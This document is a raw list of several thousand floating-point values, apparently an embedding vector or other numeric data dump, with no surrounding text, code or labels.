0.02122904174029827, 0.013450870290398598, 0.0023971516638994217, -0.0329633504152298, -0.01626710407435894, 0.0006772372289560735, -0.004576380364596844, 0.020410992205142975, 0.006225889082998037, -0.011372221633791924, -0.02679445594549179, 0.0016545375110581517, -0.018694430589675903, -0.015489287674427032, 0.01750088296830654, 0.00997751485556364, -0.005501714535057545, -0.03931999206542969, 0.01906992867588997, -0.03497494384646416, 0.001539708930067718, 0.016508495435118675, -0.0348140187561512, 0.032775599509477615, -0.03521633893251419, -0.036101438105106354, 0.017165618017315865, -0.002204373711720109, 0.04476471245288849, 0.01251883152872324, -0.0005787528934888542, -0.05130910500884056, 0.012793749570846558, 0.021014470607042313, -0.019914798438549042, -0.009541669860482216, 0.009937283582985401, 0.008301185443997383, -0.019941620528697968, -0.02192639373242855, 0.023441797122359276, -0.00673214066773653, -0.02148384228348732, 0.028350090608000755, -0.0008302023634314537, 0.025010840967297554, -0.00218593399040401, -0.01113753579556942, 0.01087602786719799, -0.037120647728443146, 0.0019579532090574503, 0.00552518293261528, -0.02381729520857334, -0.0019462188938632607, 0.022945603355765343, -0.015690447762608528, -0.009990925900638103, 0.015770910307765007, -0.015931839123368263, -0.01013173721730709, 0.009742829017341137, -0.004120418801903725, 0.011700781993567944, -0.05050446465611458, -0.020531687885522842, 0.028779231011867523, -0.025681372731924057, 0.00302074640057981, 0.008120141923427582, 0.0093203941360116, 0.0013184334384277463, -0.01243166159838438, 0.010225611738860607, 0.003133060410618782, 0.029369298368692398, -0.004355105105787516, -0.046454451978206635, -0.010078094899654388, -0.023441797122359276, 0.005223443731665611, 0.005340786650776863, -0.017527705058455467, 0.005283791571855545, -0.009327099658548832, -0.019566122442483902, 0.02354908175766468, -0.0013913537841290236, 0.013839779421687126, 0.015623394399881363, 0.04007098823785782, -0.027022436261177063, -0.0006168893887661397, 0.023522259667515755, -0.049699828028678894, 0.012619410641491413, -0.00276259146630764, 0.012170154601335526, -0.024581700563430786, 0.025010840967297554, -0.0065946816466748714, 0.01363861933350563, -0.0044724480248987675, 0.002366977743804455, 0.020598741248250008, -0.005062516313046217, -0.018788304179906845, 0.010748626664280891, 0.03127361088991165, 0.007503252476453781, 0.01906992867588997, 0.000018688459022087045, -0.0009345538564957678, 0.002197668422013521, 0.027076078578829765, -0.03366070240736008, -0.01916380226612091, -0.023039476945996284, -0.029825260862708092, -0.013216184452176094, 0.04074152186512947, -0.00541454553604126, -0.01039324514567852, -0.015770910307765007, -0.01929790899157524, 0.0007476431201212108, -0.0070137642323970795, -0.011526443995535374, -0.03363388031721115, -0.005558709613978863, -0.019324731081724167, 0.0010703365551307797, 0.014912630431354046, 0.002811205107718706, -0.011720898561179638, 0.030147116631269455, -0.006893068086355925, 0.011036955751478672, 0.02824280597269535, -0.02635190449655056, -0.02511812560260296, -0.0021876103710383177, -0.010453592985868454, -0.0159184280782938, 0.031112682074308395, 0.020934006199240685, -0.014617595821619034, 0.00420758780092001, -0.025439981371164322, -0.01436279434710741, -0.008388354443013668, -0.017514294013381004, -0.009561785496771336, 0.023495439440011978, -0.037683892995119095, 0.01609276607632637, -0.026244619861245155, -0.005109453108161688, -0.026123924180865288, 0.014698060229420662, -0.010299370624125004, 0.009260046295821667, 0.04350411146879196, 0.015422234311699867, 0.02271762117743492, 0.007047290448099375, -0.0051061008125543594, 0.0038320899475365877, -0.00276259146630764, -0.004174061119556427, -0.010507235303521156, 0.004941820167005062, 0.0018925763433799148, -0.04130476713180542, 0.0002969199267681688, -0.035189516842365265, 0.0002447441511321813, -0.004455684684216976, 0.012183565646409988, -0.0045495592057704926, -0.03502858802676201, 0.03701336309313774, 0.00552518293261528, -0.02739793434739113, 0.008214016444981098, -0.008374943397939205, 0.028081877157092094, 0.022503051906824112, 0.03859581798315048, -0.020504865795373917, -0.012378019280731678, 0.027518630027770996, 0.0167901199311018, -0.0037885054480284452, -0.008059794083237648, 0.017943434417247772, -0.0029939250089228153, -0.017433829605579376, 0.017259491607546806, -0.007154575549066067, 0.03695971891283989, -0.013987296260893345, -0.004147239960730076, -0.018828537315130234, -0.008696799166500568, 0.009333804249763489, -0.02894015796482563, 0.003106239251792431, 0.013008319772779942, 0.02385752648115158, 0.013263121247291565, -0.0030844470020383596, 0.028511017560958862, -0.012009226717054844, -0.03626236692070961, -0.031541820615530014, 0.0034180365037173033, -0.03379480913281441, -0.015972070395946503, 0.019405193626880646, 0.048305120319128036, -0.0055620623752474785, -0.02639213763177395, -0.0019797454588115215, -0.023441797122359276, 0.016387799754738808, 0.025895943865180016, 0.00037298339884728193, -0.02770637907087803, -0.018453039228916168, 0.02016960084438324, 0.013316764496266842, 0.03564547747373581, -0.03529680147767067, -0.04253854602575302, -0.0058537437580525875, 0.02430007793009281, 0.0014584069140255451, -0.012022637762129307, 0.023401563987135887, 0.0012128246016800404, -0.00813355203717947, -0.00962213333696127, -0.014470078982412815, 0.02104129269719124, -0.009065591730177402, -0.016012301668524742, -0.01512720063328743, -0.01131187379360199, -0.03240010142326355, 0.024715807288885117, 0.017970256507396698, -0.012109806761145592, -0.053696196526288986, -0.016468264162540436, 0.0009664041572250426, 0.01636097952723503, -0.0035135874059051275, -0.0025597556959837675, -0.024796271696686745, 0.002740799216553569, -0.007523368112742901, 0.025761837139725685, -0.0186407882720232, -0.021510664373636246, 0.007201512809842825, 0.0008457084186375141, -0.014268919825553894, -0.02963751181960106, -0.010607815347611904, -0.013075373135507107, 0.015247896313667297, -0.01194887887686491, -0.006769019644707441, -0.006212478503584862, -0.0043852790258824825, 0.019364962354302406, 0.037683892995119095, 0.002229518722742796, -0.03875674679875374, -0.004328283481299877, -0.003640988375991583, -0.002472586464136839, -0.028215983882546425, -0.02279808558523655, 0.019928209483623505, -0.011526443995535374, 0.008207310922443867, -0.0007363279000855982, -0.0007727880729362369, 0.02157771773636341, 0.017353367060422897, -0.003077741479501128, 0.005538593977689743, -0.011318579316139221, 0.0093203941360116, -0.015516108833253384, -0.014805344864726067, 0.013517923653125763, -0.0038052687887102365, -0.039749134331941605, 0.0091393506154418, -0.006420343182981014, 0.00875044148415327, -0.002365301363170147, 0.0008452893234789371, -0.008187195286154747, -0.030361685901880264, -0.0037985634990036488, 0.0017651753732934594, 0.019257677718997, 0.0076842959970235825, -0.014322562143206596, 0.003875674679875374, -0.023347921669483185, -0.028886515647172928, 0.016454853117465973, 0.028081877157092094, 0.016642602160573006, 0.007610537577420473, -0.029315656051039696, -0.013880010694265366, -0.00809332076460123, 0.022382356226444244, -0.006819309666752815, -0.023562492802739143, -0.00027973754913546145, -0.010399950668215752, -0.009105823934078217, 0.01089614350348711, 0.021631360054016113, -0.0036242250353097916, 0.006128661800175905, 0.012954676523804665, 0.0028497606981545687, 0.019083339720964432, 0.00813355203717947, -0.0027240358758717775, 0.002313335193321109, 0.0299861878156662, 0.00436181016266346, 0.04007098823785782, 0.009260046295821667, -0.011680666357278824, -0.019499069079756737, 0.008515755645930767, 0.012766928412020206, 0.020853543654084206, -0.022033680230379105, -0.026713991537690163, -0.01067486871033907, -0.010192085057497025, 0.02749180980026722, 0.01405434962362051, 0.01433597318828106, 0.001302508288063109, -0.005783338099718094, 0.010379834100604057, 0.03875674679875374, 0.003982959780842066, -0.0016805207123979926, -0.008817494846880436, -0.01754111610352993, -0.01943201571702957, -0.009789765812456608, -0.015985481441020966, -0.007154575549066067, 0.0021306152921169996, -0.010990018025040627, 0.022784674540162086, -0.011539855040609837, -0.006276179105043411, 0.005511772353202105, 0.028028234839439392, 0.015489287674427032, -0.010285959579050541, -0.015556341037154198, -0.01960635371506214, -0.005672700237482786, -0.0023451854940503836, 0.016039123758673668, -0.020799901336431503, 0.014912630431354046, -0.004016486462205648, 0.0067220828495919704, 0.0011843270622193813, 0.009615427814424038, -0.038649462163448334, -0.012746811844408512, -0.005451424513012171, -0.045542530715465546, -0.024702396243810654, -0.013719083741307259, -0.0029034032486379147, 0.012787044048309326, 0.006091782823204994, -0.017836149781942368, -0.009534964337944984, -0.006940005347132683, 0.02704925835132599, -0.009045476093888283, 0.01696445792913437, 0.010916260071098804, 0.007288682274520397, -0.0008092482457868755, -0.0008876166539266706, 0.001516240299679339, 0.015261306427419186, 0.004137182142585516, 0.014496900141239166, -0.01151303295046091, 0.025641141459345818, -0.023307690396904945, 0.008374943397939205, -0.018694430589675903, -0.024447593837976456, -0.0005418736254796386, -0.03108585998415947, -0.0018188179237768054, -0.021416790783405304, 0.02117539756000042, 0.005263675469905138, 0.0046769604086875916, 0.019364962354302406, 0.014550543390214443, 0.012344492599368095, 0.04328954219818115, 0.005119511391967535, -0.03095175325870514, 0.02608369290828705, 0.018520092591643333, 0.005002168007194996, -0.010205496102571487, 0.019043106585741043, -0.008904663845896721, -0.000797094835434109, 0.014966272749006748, 0.0015983805060386658, 0.010031158104538918, 0.023334510624408722, -0.011499622836709023, 0.021322915330529213, 0.026190977543592453, 0.017111975699663162, -0.013987296260893345, -0.012807159684598446, -0.024273255839943886, -0.0036778675857931376, 0.015046736225485802, -0.012317671440541744, -0.02007572539150715, 0.0026938619557768106, 0.005243559833616018, -0.01837257482111454, 0.03701336309313774, -0.0028983743395656347, -0.010292665101587772, -0.011841594241559505, 0.006058256141841412, -0.009682481177151203, -0.009246635250747204, -0.005313965491950512, -0.025547266006469727, 0.004616612568497658, -0.011385632678866386, -0.016454853117465973, 0.008086615242064, -0.009286867454648018, 0.03548454865813255, 0.0026402194052934647, -0.02148384228348732, -0.009005243889987469, -0.043477289378643036, -0.008509050123393536, -0.019043106585741043, 0.029664332047104836, 0.0018121125176548958, 0.0010736893163993955, -0.00036502082366496325, -0.004271288402378559, 0.009762944653630257, 0.005585531238466501, -0.002811205107718706, 0.015234485268592834, 0.0007929040002636611, -0.010956491343677044, 0.024930376559495926, 0.021108346059918404, 0.0043081678450107574, -0.008146963082253933, 0.032909706234931946, 0.0032721958123147488, 0.010420066304504871, -0.012176860123872757, 0.0013737522531300783, 0.011580086313188076, -0.0032017899211496115, -0.013497808016836643, 0.001251380192115903, 0.013685557059943676, -0.00035789640969596803, -0.013712378218770027, 0.02206050045788288, 0.01582455448806286, 0.009736123494803905, 0.0075770108960568905, 0.0020300354808568954, 0.005763221997767687, 0.02735770307481289, 0.028376910835504532, -0.001698122126981616, 0.004760776646435261, 0.00605155061930418, -0.001565692014992237, -0.03108585998415947, 0.005823569837957621, 0.000639100733678788, -0.005508420057594776, 0.032641492784023285, -0.021242450922727585, 0.004770834930241108, 0.016414621844887733, -0.0001631278428249061, 0.031059039756655693, 0.01644144393503666, -0.009219814091920853, -0.023294279351830482, -0.03572594001889229, -0.0034063023049384356, 0.01670965552330017, -0.0032772247213870287, 0.015623394399881363, 0.01661578193306923, 0.0046601970680058, 0.013538039289414883, 0.0005615705158561468, -0.01467123907059431, 0.009836703538894653, -0.0045294431038200855, -0.024662164971232414, -0.008254247717559338, -0.013698967173695564, 0.015221075154840946, 0.0023803883232176304, 0.004100302699953318, 0.008730325847864151, 0.0018087598728016019, -0.026995616033673286, 0.019271086901426315, 0.004331636242568493, -0.011975700035691261, -0.013799547217786312, -0.012612706050276756, -0.0076842959970235825, -0.0012094719568267465, -0.025507034733891487, 0.013243005611002445, 0.0033157803118228912, 0.04404053837060928, -0.01074192114174366, -0.03835442662239075, -0.016293926164507866, 0.01374590490013361, -0.01599889248609543, 0.013102194294333458, -0.01793002337217331, -0.004140534903854132, -0.009219814091920853, 0.012029343284666538, -0.005431308876723051, -0.028376910835504532, 0.010373128578066826, 0.017044922336935997, -0.003956138622015715, 0.018439628183841705, 0.017205849289894104, -0.019941620528697968, -0.0009102470939978957, 0.036289189010858536, -0.010922965593636036, 0.010621225461363792, -0.036423295736312866, 0.022395767271518707, 0.005065868608653545, -0.04353093355894089, -0.0021624655928462744, -0.014966272749006748, 0.0005368446581996977, -0.0028765820898115635, 0.0026720697060227394, -0.011868415400385857, -0.0023820647038519382, 0.01289432868361473, -0.01754111610352993, 0.013363701291382313, -0.006946710869669914, -0.024313487112522125, 0.02082672156393528, -0.0019579532090574503, -0.005028989631682634, -0.021738644689321518, -0.012599295005202293, 0.006769019644707441, 0.018600555136799812, -0.00008344979141838849, 0.005112805869430304, -0.030576257035136223, -0.005357549991458654, 0.0032990172039717436, -0.023870937526226044, 0.02381729520857334, -0.004442274104803801, 0.006152130663394928, 0.008716914802789688, -0.008019561879336834, -0.004311520140618086, -0.02600322850048542, -0.0017023129621520638, 0.0014978006947785616, -0.01103025022894144, -0.006343232002109289, -0.025976406410336494, -0.00872362032532692, 0.023656366392970085, 0.02578865736722946, -0.005880564916878939, -0.0018674314487725496, 0.005652584135532379, 0.013444165699183941, -0.01727290265262127, 0.0022110790014266968, 0.020410992205142975, 0.02314676158130169, 0.013216184452176094, -0.008234132081270218, -0.016334157437086105, -0.020464634522795677, 0.03639647364616394, -0.0020820016507059336, -0.03494812548160553, -0.0029067560099065304, -0.031380895525217056, 0.021242450922727585, 0.00872362032532692, 0.02297242358326912, 0.0026167507749050856, 0.008475523442029953, 0.040714699774980545, 0.019391784444451332, 0.011519738472998142, -0.020223243162035942, 0.016857173293828964, -0.012183565646409988, 0.0031464709900319576, -0.006473985966295004, -0.02183252014219761, -0.02310653030872345, 0.002073619980365038, 0.015261306427419186, 0.0009722713148221374, 0.0037885054480284452, -0.005813512019813061, 0.0017987019382417202, 0.008368238806724548, 0.000848641968332231, -0.0009219814091920853, 0.030710361897945404, -0.005096042528748512, 0.00806649960577488, 0.0011717545567080379, 0.028779231011867523, 0.01881512627005577, -0.006004613358527422, 0.026298262178897858, 0.0012279115617275238, 0.002231195103377104, -0.01255906280130148, 0.015502698719501495, -0.004552911967039108, -0.003919259179383516, 0.01595865935087204, 0.04846604913473129, 0.014496900141239166, -0.0005645040655508637, -0.013826368376612663, 0.029798438772559166, 0.02621779777109623, 0.004076834302395582, 0.006447164341807365, 0.0079592140391469, -0.04489881917834282, -0.01933814026415348, -0.03046897053718567, -0.028966980054974556, -0.00029084322159178555, 0.02104129269719124, 0.005297202151268721, -0.01129175815731287, 0.031944140791893005, -0.025104716420173645, -0.0016545375110581517, -0.02254328317940235, 0.0185871459543705, 0.025010840967297554, -0.006899773608893156, -0.01516743190586567, -0.00947461649775505, -0.0038522060494869947, 0.03175639361143112, -0.00674219848588109, -0.02258351631462574, -0.009903756901621819, -0.008321301080286503, -0.0044724480248987675, 0.0012103101471439004, -0.025574088096618652, 0.0032084952108561993, 0.022328713908791542, -0.00824754312634468, -0.004324931185692549, 0.004522738046944141, -0.011714193038642406, -0.008609630167484283, -0.012639527209103107, 0.014563953503966331, -0.025895943865180016, -0.00824754312634468, 0.020196421071887016, 0.01959294266998768, 0.01103025022894144, 0.005065868608653545, -0.0003413426748011261, 0.02161794900894165, -0.00920640304684639, 0.004703781567513943, -0.003610814455896616, -0.01636097952723503, 0.0015254601603373885, -0.012652937322854996, 0.008012856356799603, 0.0051429797895252705, 0.01118447259068489, 0.0021121755708009005, -0.02608369290828705, 0.005793395917862654, 0.013196068815886974, -0.03827396407723427, 0.02648601122200489, 0.017836149781942368, -0.002316687721759081, 0.00997751485556364, -0.0014558924594894052, 0.006819309666752815, -0.013370406813919544, -0.0065075126476585865, 0.004901588428765535, -0.008334712125360966, 0.0032856063917279243, 0.008234132081270218, -0.005059163551777601, -0.022865138947963715, 0.005411192774772644, 0.01359168253839016, 0.0067790779285132885, -0.0036443411372601986, 0.007147870492190123, 0.007878750562667847, 0.00620577298104763, -0.005015579052269459, 0.01784956082701683, 0.03599415346980095, 0.0005636659334413707, -0.007382556796073914, -0.013853189535439014, 0.022073911502957344, 0.007074112072587013, -0.010594404302537441, -0.02644577994942665, -0.015395413152873516, 0.010279254987835884, -0.002467557555064559, 0.007771464996039867, 0.016696244478225708, 0.0055419462732970715, 0.020987650379538536, 0.010882733389735222, -0.018292110413312912, 0.009970810264348984, -0.008053088560700417, 0.004147239960730076, 0.0009898727294057608, 0.010332897305488586, 0.005826922599226236, -0.0055620623752474785, -0.01906992867588997, -0.026901740580797195, -0.0012941266177222133, -0.004462390206754208, 0.003024098929017782, -0.015489287674427032, 0.024675576016306877, 0.008032972924411297, 0.008234132081270218, -0.01972704939544201, 0.015422234311699867, 0.012398135848343372, -0.007302092853933573, 0.003533703275024891, 0.0022412529215216637, -0.0024742628447711468, 0.0011784598464146256, 0.0002954531228169799, 0.00920640304684639, 0.016682835295796394, -0.013450870290398598, 0.0007442904752679169, 0.02639213763177395, 0.011647139675915241, -0.02117539756000042, 0.022435998544096947, 0.023911168798804283, -0.0042377617210149765, -0.019713638350367546, 0.0031699396204203367, -0.0023720066528767347, -0.004368515685200691, -0.006256063003093004, -0.007918981835246086, -0.00977635569870472, 0.0028799346182495356, 0.009266750887036324, -0.006661734543740749, -0.01837257482111454, -0.000054218791774474084, 0.010882733389735222, -0.018560323864221573, 0.005655936896800995, -0.0037784473970532417, 0.014698060229420662, 0.045757099986076355, -0.013538039289414883, -0.0028816109988838434, -0.009783061221241951, 0.005840333178639412, 0.02218119613826275, 0.003694630926474929, 0.0016553757013753057, -0.005444719456136227, 0.013524629175662994, -0.006349937524646521, -0.0012974792625755072, -0.00637005316093564, 0.012800454162061214, -0.016548728570342064, -0.020236654207110405, -0.00991046242415905, 0.018265290185809135, -0.011767835356295109, -0.006598034407943487, -0.006557802204042673, 0.028028234839439392, -0.0068662469275295734, -0.003421389264985919, 0.025574088096618652, 0.002656982745975256, -0.008455407805740833, 0.006152130663394928, 0.0033761283848434687, 0.011741014197468758, -0.0063231163658201694, -0.02171182446181774, -0.017916614189743996, -0.0005510934279300272, 0.012183565646409988, -0.02218119613826275, 0.01543564535677433, -0.0016847114311531186, 0.0030140411108732224, 0.02214096486568451, 0.010306076146662235, -0.018090952187776566, 0.007711117155849934, 0.018439628183841705, 0.04017827287316322, 0.017179029062390327, 0.0035772877745330334, -0.01644144393503666, 0.007261860650032759, -0.010171969421207905, 0.010560877621173859, -0.0006424534367397428, 0.017594758421182632, 0.0097562400624156, 0.011673960834741592, 0.025641141459345818, -0.031461358070373535, -0.016870584338903427, 0.011633728630840778, -0.007858633995056152, -0.026459190994501114, 0.013504513539373875, -0.000002763325028354302, 0.006178951822221279, 0.02569478377699852, -0.008582809008657932, 0.004090244881808758, -0.002925195498391986, 0.011117419227957726, 0.0018909000791609287, -0.018627377226948738, -0.008006150834262371, -0.007275271695107222, 0.04892200976610184, -0.008636451326310635, -0.0038287374190986156, -0.005930854938924313, -0.019579531624913216, 0.0013779430883005261, -0.008529165759682655, -0.004740660544484854, 0.010252432897686958, -0.015408824197947979, 0.015489287674427032, 0.02252987213432789, 0.004475800786167383, 0.00022379003348760307, 0.012512126006186008, 0.007020469289273024, 0.019485658034682274, 0.0318368561565876, -0.012357903644442558, 0.0013209478929638863, -0.043611396104097366, 0.030200758948922157, -0.012170154601335526, -0.006644971668720245, -0.02455488033592701, 0.0071076382882893085, 0.003473355434834957, -0.00885772705078125, -0.012941266410052776, 0.03449216112494469, 0.015261306427419186, -0.011848298832774162, -0.004348399583250284, 0.008408470079302788, 0.03197096288204193, -0.005790043156594038, -0.003855558577924967, -0.002655306365340948, 0.010694984346628189, -0.00042641640175133944, -0.0021624655928462744, 0.019673407077789307, -0.0022663979325443506, -0.021725235506892204, 0.006175599060952663, 0.0028514370787888765, 0.007878750562667847, -0.0011784598464146256, -0.024407362565398216, -0.005357549991458654, -0.030200758948922157, 0.022221427410840988, -0.0031665870919823647, 0.011171062476933002, -0.01471147034317255, 0.02074625715613365, -0.01947224698960781, -0.002623456297442317, 0.01025913842022419, 0.015033326111733913, -0.03285606577992439, 0.006484043784439564, 0.005441366694867611, 0.01784956082701683, 0.010540761984884739, -0.010534056462347507, 0.001564853941090405, -0.006400227081030607, -0.0013410638784989715, -0.00557882571592927, -0.012525536119937897, 0.010936375707387924, -0.048251476138830185, 0.02586912177503109, -0.020115958526730537, 0.01893582195043564, 0.019914798438549042, -0.0038857324980199337, 0.0037248048465698957, 0.006712024565786123, -0.006812604609876871, 0.00887784268707037, 0.0072149233892560005, -0.006879657506942749, 0.010487119667232037, 0.005085984710603952, 0.004462390206754208, -0.010460298508405685, 0.00791227724403143, -0.007375851273536682, -0.0049786996096372604, 0.01451031118631363, -0.029181549325585365, 0.004311520140618086, 0.016642602160573006, 0.012646232731640339, 0.014617595821619034, 0.025010840967297554, 0.013584977015852928, -0.000025983112209360115, -0.01317595224827528, -0.006078371778130531, -0.00842188112437725, -0.014255508780479431, 0.0034364762250334024, 0.023777062073349953, 0.005230149254202843, -0.008026267401874065, -0.01289432868361473, 0.007972625084221363, -0.01253894716501236, -0.008690093643963337, 0.01750088296830654, -0.010037862695753574, 0.016602370887994766, -0.009273456409573555, -0.009085707366466522, -0.004730602726340294, 0.007778170518577099, -0.028993800282478333, 0.00536090275272727, -0.006473985966295004, -0.0183323435485363, 0.0010560877854004502, -0.014496900141239166, -0.0195124801248312, -0.0012312642065808177, -0.014161634258925915, -0.01872125081717968, 0.0016360979061573744, 0.02969115413725376, 0.0001350493257632479, -0.029744796454906464, -0.0046568443067371845, 0.0014106315793469548, 0.01074192114174366, 0.016897404566407204, 0.004945172928273678, -0.004060070961713791, 0.00842188112437725, 0.02451464720070362, 0.008207310922443867, -0.023562492802739143, -0.007945802994072437, 0.007349030114710331, 0.0019059870392084122, -0.013960475102066994, 0.002311658812686801, 0.003936022520065308, 0.01436279434710741, 0.018479859456419945, 0.010943081229925156, -0.010815680027008057, -0.0006038978463038802, 0.003258785232901573, -0.0019462188938632607, -0.003795210737735033, 0.007831812836229801, 0.01346428133547306, 0.007275271695107222, -0.013263121247291565, -0.0044221580028533936, 0.03226599842309952, -0.001674653496593237, 0.0023300985340029, 0.007818402722477913, 0.00033610413083806634, 0.021993447095155716, -0.012760222889482975, -0.002651953836902976, 0.02314676158130169, -0.004432216286659241, 0.0024893498048186302, 0.009146055206656456, -0.0177154541015625, 0.0017106946324929595, -0.0033308672718703747, 0.0011273318668827415, 0.005149685312062502, 0.00962213333696127, 0.014067759737372398, -0.034706734120845795, 0.012760222889482975, 0.026231208816170692, 0.002687156666070223, 0.012652937322854996, 0.0013234623475000262, 0.01225732360035181, -0.012968087568879128, -0.002730741398409009, 0.009199698455631733, 0.02464875392615795, 0.0165353175252676, 0.005987850017845631, -0.005096042528748512, 0.005635820794850588, -0.005719637498259544, -0.010956491343677044, -0.0029352535493671894, -0.006229241844266653, 0.003718099556863308, -0.014684649184346199, -0.011224704794585705, -0.004334989003837109, -0.0065075126476585865, -0.0031481473706662655, 0.013383817858994007, -0.0035974038764834404, 0.025681372731924057, 0.008944896049797535, -0.000902703613974154, -0.019914798438549042, -0.0030358333606272936, -0.0009077325812540948, -0.011150945909321308, 0.00780499167740345, 0.008991832844913006, 0.010540761984884739, 0.04103655368089676, 0.02824280597269535, 0.0003930993552785367, 0.0065075126476585865, -0.026888331398367882, -0.012062869034707546, -0.0015573104610666633, 0.007858633995056152, -0.008790673688054085, 0.010145148262381554, -0.018748072907328606, -0.010594404302537441, -0.0020467988215386868, -0.01955271139740944, 0.019525889307260513, -0.01115765143185854, 0.022556694224476814, -0.016910815611481667, 0.011472801677882671, 0.038515355437994, -0.006725435145199299, 0.001966334879398346, -0.010091505944728851, -0.0030140411108732224, 0.016696244478225708, -0.006028082221746445, -0.012887624092400074, 0.005176506470888853, -0.000797094835434109, 0.008790673688054085, -0.028698766604065895, 0.01440302561968565, -0.01129175815731287, 0.010178674943745136, 0.010017747059464455, -0.016803530976176262, -0.012968087568879128, -0.006463927682489157, 0.020330527797341347, 0.0007065730169415474, 0.014631006866693497, -0.010339602828025818, 0.016723066568374634, -0.009642248973250389, -0.007905571721494198, 0.0036678097676485777, 0.02279808558523655, 0.0011130829807370901, 0.0018221705686300993, 0.011586791835725307, 0.0058738598600029945, 0.005900681018829346, -0.01258588396012783, 0.0033928914926946163, -0.01758134737610817, -0.01636097952723503, 0.007040585391223431, 0.005652584135532379, 0.004016486462205648, 0.003421389264985919, 0.002682127756997943, 0.04784915968775749, 0.00567940529435873, -0.019633175805211067, -0.026150746271014214, 0.0025949585251510143, 0.025895943865180016, 0.0015623393701389432, 0.016562139615416527, -0.006792488507926464, 0.020585330203175545, 0.02034393884241581, 0.014778523705899715, -0.00035181973362341523, -0.017514294013381004, -0.007845223881304264, -0.0033040461130440235, -0.013531334698200226, 0.005803453736007214, 0.007503252476453781, 0.004338341765105724, -0.03838124871253967, -0.002097088610753417, -0.0060884300619363785, -0.018251879140734673, -0.013987296260893345, -0.029181549325585365, 0.03240010142326355, -0.006011318881064653, 0.01082909107208252, -0.01422868762165308, -0.026030050590634346, -0.01964658498764038, 0.00809332076460123, -0.02258351631462574, -0.006346584763377905, 0.015140610747039318, -0.006199067924171686, -0.008086615242064, -0.029369298368692398, 0.006872952450066805, 0.002286513801664114, 0.003342601703479886, -0.0038119740784168243, -0.013229595497250557, -0.00025082085630856454, -0.022114142775535583, -0.012378019280731678, -0.005186564289033413, 0.009327099658548832, 0.014322562143206596, 0.009501437656581402, -0.022650567814707756, -0.02776002138853073, 0.03272195905447006, -0.0062527102418243885, 0.02258351631462574, 0.004482505843043327, 0.0021423494908958673, 0.011365516111254692, 0.005491656716912985, 0.0003958233864977956, 0.0021591128315776587, -0.01100342907011509, -0.02337474375963211, -0.0015229457058012486, -0.0023770357947796583, 0.006913184188306332, 0.010929670184850693, -0.04538160189986229, 0.0013947064289823174, -0.007141164969652891, -0.0035538191441446543, -0.006262768059968948, 0.012357903644442558, -0.0071210493333637714, 0.00013201097317505628, -0.0021591128315776587, -0.021121755242347717, 0.028296448290348053, 0.01117776706814766, 0.006406932603567839, -0.0002006357244681567, -0.0012681435327976942, -0.0028229395393282175, -0.0033308672718703747, -0.024447593837976456, -0.011915352195501328, -0.037683892995119095, -0.012243913486599922, 0.0029352535493671894, -0.010158558376133442, 0.0020769727416336536, -0.02511812560260296, 0.008810789324343204, -0.013652030378580093, 0.00874373596161604, -0.0023183641023933887, 0.0044925641268491745, -0.0033576886635273695, 0.007570305373519659, 0.0024809681344777346, 0.019633175805211067, 0.005498361773788929, 0.0019411899847909808, -0.008938190527260303, 0.015529519878327847, 0.02337474375963211, 0.009595312178134918, -0.008609630167484283, 0.008334712125360966, -0.030790826305747032, 0.006202420219779015, 0.026378726586699486, -0.026097102090716362, -0.015797732397913933, 0.017125384882092476, 0.00536090275272727, -0.016803530976176262, 0.005330728832632303, -0.023575901985168457, 0.004167356062680483, 0.003029128070920706, 0.0030408622696995735, -0.0025832243263721466, -0.003265490522608161, 0.026861509308218956, -0.001218691817484796, 0.011995816603302956, -0.012505420483648777, 0.025104716420173645, 0.022342124953866005, -0.018573734909296036, 0.006701966747641563, 0.00473395548760891, 0.014523721300065517, 0.01978069171309471, 0.000010241327800031286, 0.008737031370401382, -0.03454580530524254, -0.008998538367450237, -0.0074697257950901985, -0.01315583661198616, 0.010312780737876892, -0.002393798902630806, -0.009239929728209972, -0.016253694891929626, -0.008851021528244019, -0.0013494455488398671, 0.02157771773636341, -0.0068662469275295734, 0.015542929992079735, 0.004542853683233261, -0.01810436137020588, -0.008931485004723072, -0.028511017560958862, -0.016508495435118675, 0.012773633003234863, 0.010614520870149136, -0.012746811844408512, -0.00009502694592811167, 0.018922410905361176, -0.005548651795834303, 0.010969902388751507, -0.008985128253698349, 0.02310653030872345, -0.00872362032532692, -0.018305521458387375, -0.008260953240096569, -0.006745551247149706, -0.0003078160516452044, 0.011573380790650845, 0.0018758131191134453, -0.018573734909296036, -0.00260334019549191, 0.02560090832412243, 0.004804361145943403, -0.007141164969652891, -0.0052200909703969955, -0.0027257122565060854, 0.0022429293021559715, -0.023039476945996284, 0.02691515162587166, -0.015837963670492172, 0.03344613313674927, -0.005820217076689005, 0.0017987019382417202, -0.008193899877369404, -0.008100025355815887, 0.005049105267971754, 0.007442904636263847, -0.0075770108960568905, 0.0025882532354444265, -0.029101086780428886, 0.0022496345918625593, -0.008683388121426105, -0.008053088560700417, -0.020813310518860817, 0.00185569713357836, -0.001062793075107038, 0.0039460803382098675, -0.0031162970699369907, 0.00026905094273388386, -0.008341417647898197, -0.03497494384646416, 0.015355180948972702, -0.01405434962362051, -0.008488934487104416, 0.002363624982535839, 0.017997076734900475, 0.009903756901621819, 0.01595865935087204, 0.0034599448554217815, -0.005226796492934227, -0.004854651167988777, 0.013511218130588531, -0.023669777438044548, 0.009394152089953423, -0.008891253732144833, -0.0072149233892560005, 0.020504865795373917, -0.003872321918606758, 0.003324161982163787, 0.00019560674263630062, 0.017179029062390327, -0.015449055470526218, -0.014121402986347675, -0.0020568566396832466, -0.014040938578546047, -0.03162228688597679, -0.0005502552958205342, -0.0050558107905089855, 0.024930376559495926, 0.01251883152872324, -0.005776632577180862, -0.011224704794585705, -0.019324731081724167, 0.013678851537406445, 0.0036242250353097916, 0.0015221075154840946, -0.007007058709859848, 0.02252987213432789, 0.0001511839946033433, 0.01359168253839016, -0.007208218332380056, -0.002764267846941948, -0.01451031118631363, -0.0008260115282610059, -0.007872045040130615, -0.006185656879097223, -0.016293926164507866, -0.03918588533997536, -0.012988203205168247, -0.022811496630311012, 0.005102748051285744, -0.006571212783455849, -0.00001337134926870931, -0.021282684057950974, -0.007409377954900265, -0.00412377156317234, 0.018600555136799812, 0.009239929728209972, 0.003563877195119858, 0.0007036394672468305, 0.015033326111733913, -0.005495009012520313, 0.005662641953676939, 0.012652937322854996, 0.009722713381052017, 0.01346428133547306, -0.027371114119887352, -0.004616612568497658, -0.029744796454906464, -0.008864432573318481, -0.0017450593877583742, -0.008985128253698349, -0.0005674376734532416, 0.022704211995005608, -0.011124124750494957, 0.00982329249382019, 0.021845931187272072, 0.017474062740802765, -0.0170985646545887, -0.0044925641268491745, 